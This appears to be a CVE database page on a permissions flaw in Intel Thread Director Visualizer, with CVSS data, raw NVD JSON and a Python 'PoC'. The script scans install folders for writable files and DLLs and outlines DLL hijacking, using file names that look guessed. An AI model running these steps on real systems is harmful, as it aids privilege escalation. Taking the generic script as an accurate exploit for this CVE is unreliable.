Security Vulnerability Report
中文
CVE-2025-31940 CVSS 6.7 MEDIUM

CVE-2025-31940

Published: 2025-11-11 17:15:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Incorrect default permissions for some Intel(R) Thread Director Visualizer software before version 1.1.1 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Intel Thread Director Visualizer < 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-31940 PoC - Intel Thread Director Visualizer Permission Escalation # Note: This PoC demonstrates the vulnerability concept for authorized testing only import os import sys import ctypes import subprocess from pathlib import Path def check_vulnerable_install(): """Check if Intel Thread Director Visualizer is installed with vulnerable permissions""" possible_paths = [ r"C:\Program Files\Intel\Thread Director Visualizer", r"C:\Program Files (x86)\Intel\Thread Director Visualizer", os.path.expanduser(r"~\AppData\Local\Programs\Intel\Thread Director Visualizer") ] vulnerable_instances = [] for install_path in possible_paths: if os.path.exists(install_path): # Check if low-privileged users have write access try: # Test write access to installation directory test_file = os.path.join(install_path, "test_write_access.tmp") with open(test_file, 'w') as f: f.write("test") os.remove(test_file) # Check critical files permissions critical_files = ["ThreadDirectorVisualizer.exe", "config.dat", "driver.dll"] for filename in critical_files: file_path = os.path.join(install_path, filename) if os.path.exists(file_path): # Check if file is writable by non-admin users if os.access(file_path, os.W_OK): vulnerable_instances.append({ "path": install_path, "file": filename, "vulnerable": True }) except (PermissionError, IOError): pass return vulnerable_instances def exploit_via_dll_hijacking(vulnerable_path, malicious_dll_path): """ Exploit DLL hijacking vulnerability to escalate privileges This technique works when the application loads DLLs from its directory """ target_exe = os.path.join(vulnerable_path, "ThreadDirectorVisualizer.exe") if not os.path.exists(target_exe): print("[-] Target executable not found") return False # Common DLLs that applications might load unsafely dll_names = ["msvcr120.dll", "msvcp120.dll", "vcruntime140.dll", "concrt140.dll", "vccorlib140.dll"] for dll_name in dll_names: target_dll = os.path.join(vulnerable_path, dll_name) if os.path.exists(target_dll) and os.access(target_dll, os.W_OK): print(f"[*] Found writable DLL: {target_dll}") print(f"[*] To exploit: Replace with malicious DLL to achieve code execution") return True return False def main(): print("=" * 60) print("CVE-2025-31940 Intel Thread Director Visualizer Exploitation") print("For authorized security testing only") print("=" * 60) # Check for vulnerable installations print("\n[+] Checking for vulnerable installations...") vulnerable_instances = check_vulnerable_install() if not vulnerable_instances: print("[-] No vulnerable installations found") print("[*] Note: Vulnerability requires specific permission misconfigurations") return print(f"[+] Found {len(vulnerable_instances)} potentially vulnerable instance(s)") for instance in vulnerable_instances: print(f"\n[*] Installation Path: {instance['path']}") print(f"[*] Vulnerable File: {instance['file']}") # Attempt DLL hijacking exploitation exploit_via_dll_hijacking(instance['path'], None) print("\n[!] This is a demonstration script") print("[!] Actual exploitation requires additional steps and reverse engineering") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31940", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:48.413", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect default permissions for some Intel(R) Thread Director Visualizer software before version 1.1.1 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01375.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.